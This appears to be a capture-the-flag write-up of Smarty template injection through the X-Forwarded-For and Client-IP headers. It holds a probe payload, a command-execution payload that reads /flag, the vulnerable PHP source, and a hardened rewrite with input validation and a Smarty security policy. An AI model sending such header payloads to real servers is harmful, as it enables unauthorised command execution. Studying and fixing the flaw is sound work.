X-Forwarded-For
When you see the challenge, this header is the first thing to think of.
In Burp, add an X-Forwarded-For header to the request: the page echoes the value back, so it is attacker-controlled and may be rendered as a template rather than printed.
Set X-Forwarded-For: {{7*7}}; if the response shows 49, the header is being evaluated as a template.
From there it is the usual route: inject a command.
X-Forwarded-For: {{system("cat /flag")}}
Nothing more to say about the process; here is the source.
<?php
require_once('header.php');
require_once('./libs/Smarty.class.php');

$smarty = new Smarty();

// Client-IP is consulted before X-Forwarded-For; both are plain request headers,
// only REMOTE_ADDR is set by the server.
if (!empty($_SERVER['HTTP_CLIENT_IP']))
{
    $ip = $_SERVER['HTTP_CLIENT_IP'];
}
elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR']))
{
    $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
}
else
{
    $ip = $_SERVER['REMOTE_ADDR'];
}

//$your_ip = $smarty->display("string:".$ip);
echo "<div class=\"container panel1\">
    <div class=\"row\">
        <div class=\"col-md-4\">
        </div>
        <div class=\"col-md-4\">
            <div class=\"jumbotron pan\">
                <div class=\"form-group log\">
                    <label><h2>Your IP is : ";
// The sink: the header value is used as the template source itself.
$smarty->display("string:".$ip);
echo " </h2></label>
                </div>
            </div>
        </div>
        <div class=\"col-md-4\">
        </div>
    </div>
</div>";
?>
Note the line
$smarty->display("string:".$ip);
The string: resource tells Smarty to treat its argument as the template source, so whatever arrives in the header is compiled and executed as a template, not just echoed. Because $_SERVER['HTTP_CLIENT_IP'] is checked first, a Client-IP header reaches the same sink. Worth looking into specifically; it is fairly rare.
PHP template injection (Smarty templates)
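As an added example, not the challenge's code, here is the same handler with the header treated as data instead of as template source. It assumes Smarty 3 is available at ./libs/Smarty.class.php, as on the page; everything else is standard PHP.

```php
<?php
// Added example: hardened version of the challenge's IP display.
// Assumes Smarty 3 at ./libs/Smarty.class.php as in the original page.
require_once('./libs/Smarty.class.php');

$smarty = new Smarty();

// Same header precedence as the original, kept to show the data flow.
// Client-IP and X-Forwarded-For are request headers and therefore attacker
// controlled; only REMOTE_ADDR is filled in by the server.
if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
    $ip = $_SERVER['HTTP_CLIENT_IP'];
} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
    // X-Forwarded-For may be a comma-separated chain; take the first hop.
    $ip = trim(explode(',', $_SERVER['HTTP_X_FORWARDED_FOR'])[0]);
} else {
    $ip = $_SERVER['REMOTE_ADDR'];
}

// 1. Validate: anything that is not an IP literal is discarded, so probes
//    such as {{7*7}} or {system("cat /flag")} never reach the renderer.
if (filter_var($ip, FILTER_VALIDATE_IP) === false) {
    $ip = 'unknown';
}

// 2. The actual fix: the template is a constant and $ip is a variable.
//    In the original, display("string:" . $ip) made the header the template;
//    here Smarty only ever sees header content as data.
$smarty->assign('ip', $ip);

// 3. Defence in depth: enable Smarty's security policy so that a template
//    injection elsewhere still cannot call PHP functions. In Smarty_Security
//    an empty array means "all allowed"; null disables the feature entirely.
$smarty->enableSecurity();
$smarty->security_policy->php_functions = null;   // no PHP functions as tags
$smarty->security_policy->php_modifiers = null;   // no PHP functions as modifiers
$smarty->security_policy->static_classes = null;  // no static class access

// The string: resource is fine when the string is a constant written by us.
$smarty->display('string:<h2>Your IP is : {$ip|escape}</h2>');
```

The change that matters is step 2: the header becomes a template variable and the template itself is fixed, so no header value is ever parsed as Smarty syntax. The IP validation and the security policy are additional layers; on their own neither would be the right fix, because display("string:" . $ip) is the bug.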